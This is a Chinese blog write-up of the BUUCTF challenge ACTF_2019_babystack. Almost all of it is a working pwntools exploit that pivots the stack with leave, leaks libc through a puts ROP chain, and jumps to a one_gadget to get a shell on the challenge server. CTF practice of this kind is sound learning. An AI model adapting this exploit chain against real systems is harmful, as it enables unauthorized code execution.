BUU-actf_2019_babystack-WP

chuj

2020 年 12 月 29 日

585 次浏览

暂无评论

2199字数

CTF-WP

<p> 一道简单的通过leave栈迁移实现更长的rop链的题</p>

<pre class="wp-block-code"><code>#!/usr/bin/env python                                        
# coding=utf-8                                               
from pwn import *                                            
from LibcSearcher import *                                   
pop_rdi_ret = 0x400ad3                                       
context(log_level = 'debug')                                 
                                                             
sh = remote("node3.buuoj.cn","28568")                        
#sh = process("./ACTF_2019_babystack")                       
elf = ELF("./ACTF_2019_babystack")                           
libc = ELF("./buu-libc-2.23.so")                             
sh.sendlineafter("e?\n>",str(0xE0))                          
sh.recvuntil("at ")                                          
stackaddr = int(sh.recvuntil("\n",drop = True),base = 16)    
payload  = 'fillfill' + p64(pop_rdi_ret) + p64(elf.got["puts"])
payload += p64(elf.symbols["puts"]) + p64(0x400800)          
payload = payload.ljust(0xD0,'a')                            
payload += p64(stackaddr) + p64(0x400A18)                    
sh.sendafter('>',payload)                                    
sh.recvuntil("e~\n")                                         
puts_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
LIBC = LibcSearcher('puts',puts_addr)                        
base = puts_addr - LIBC.dump('puts')                         
print base                                                   
                                                             
sh.sendlineafter("e?\n>",str(0xE0))                          
sh.recvuntil("at ")                                          
stackaddr = int(sh.recvuntil("\n",drop = True),base = 16)    
payload  = 'a'                                               
payload = payload.ljust(0xD8,'a')                            
payload += p64(base + 0x10a38c)                              
sh.sendafter('>',payload)                                    
                                                             
sh.interactive()                                               </code></pre>

最后修改：2020 年 12 月 30 日